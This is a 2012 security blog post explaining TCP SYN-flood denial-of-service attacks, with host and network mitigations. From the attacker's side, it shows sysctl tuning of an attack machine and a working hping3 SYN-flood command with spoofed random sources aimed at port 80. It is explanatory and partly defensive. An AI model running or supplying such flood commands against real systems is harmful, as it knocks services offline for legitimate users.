Thursday, December 20, 2012

L4 syn-flooding ( a look at howto )

We will talk about   L4 syn-flood and tuning an attack machine to achieve the best flood performance.  L4 syn-floods are a common means of a DoS attack against a web service or any server that using tcp.

In this type of attack, a  attacker send SYN  request to the target and does not complete step #3 of the three-way tcp handshake. What this does; is to consume memory/processor/resources on the targeted server, creating a Denial of Service for legit users.

Base on the target system, you might have some means to place minimal mitigation  tweaking , to reduce the  impact of a syn-flood. On linux host for example,  that  can be control with the following system control option;

net.ipv4.conf.all.rp_filter = 1

The latter helps with handling spoof ip_addresses, or with  iptables  &  enabling  iptables rules rules to limit sessions. Most other systems have a few tweaks here or there.

All of these are local_on_host mitigation strategies, and the effectiveness is a hit or miss. Mainly a miss, but it’s better than nothing. The best  syn-flood protection is anything off host,  or even better yet a cloud mitigation provider, between you and the attacking sources.

Now to look at the attack from  the attacker point of view, and using  any of the well-known  DoS tools. I’m going to demonstrate via hping3 which is a common tool, but others exist such as;  t50 or mz. With the latter being my personal favorite btw.

1st we  need a system that runs the DoS tool. In my case, I’m using a computer.waffen (  computer weapon in german )  that’s based around a Dell Server and with 3.4ghz cpu , a heavily modified  linux kernel and nic drivers.

2nd  we need to tweak our systems ephemeral port ranges. These are the ranges of sockets that we open or commonly know as src_ports. The greater the range, allows us to really ramp the box up. Sysctl will allow us to set the port range

 net.ipv4.ip_local_port_range = 1024 65536

we also play around with socket reuse;

net.ipv4.tcp_tw_reuse = 1

net.ipv4.tcp_tw_recycle  =  1

Now that we have the systems ready to go, we can now deploy the computer.waffen we. Keep in mind, the  attacker machine is really limited by the following;

·      Cpu/memory
·      Ephemeral port range
·      Network bandwidth
·      Any network component in the network path between attacker and victim ( target )

To execute a basic  hping synflood at  web-server, we would do the following;

[root@computer01.waffen ~]# sysctl net.ipv4.ip_local_port_range
net.ipv4.ip_local_port_range = 32768    61000

[root@computer01.waffen ~]#sysctl -w  net.ipv4.ip_local_port_range=1024

[root@computer01.waffen ~]# sysctl net.ipv4.ip_local_port_range
net.ipv4.ip_local_port_range = 1024     61000

[root@computer01.waffen ~]#hping3 -S -p 80 --rand-source -i bond1

As you can see that host @ port 80 will come under an L4-attack. This particular machine details;

[root@computer01.waffen]# cat cpuinfo |  grep "model" | head -n1
model           : 44

[root@computer01.waffen]# cat cpuinfo |  grep "model name" | head -n1
model name      : Intel(R) Xeon(R) CPU           X5690  @ 3.47GHz

[root@computer01.waffen]# cat cpuinfo |  grep "processor" | wc
     24      72     350

[root@computer01.waffen]# dmesg  | grep  "10 Gigabit"
ixgbe: Intel(R) 10 Gigabit PCI Express Network Driver - version 3.4.8-k
ixgbe 0000:04:00.1: Intel(R) 10 Gigabit Network Connection

Can you say ouch, if I was to attack you. Your day would be ruin.

This machine can deliver over 200-300mbps of attack traffic. Now try to picture your host, firewall or IPS , trying to defend against this. Better yet, a end-users ( client ) trying to reach your website , & while  your out  exhausting your staff towards the  defense against the flood.

Okay let’s look at some mitigation strategies outside or off the host;

·      Deploy a intercepting IPS and trigger RST to the server
·      Rate-limit icmp network unreachable on edge border routers
·      Rate-limit SYN sessions inbound at firewall
·      Hire a cloud mitigation company
·      Deploy rate-limits devices between firewall dmz and web-servers ( Aka SLB )

In all fairness, most major enterprise or online market places, deploy all  of the above. A properly organized  L4-syn-flood based attack, and no mitigation stance, will always  equal in to lower site availability number or higher latency.

I hope this has been informational and helpful in just one of many ways to create and mitigate L4 syn-floods attacks.

Ken Felix
Freelance Security Network Engineer
kfelix at    hyperfeed   dot   com 

No comments:

Post a Comment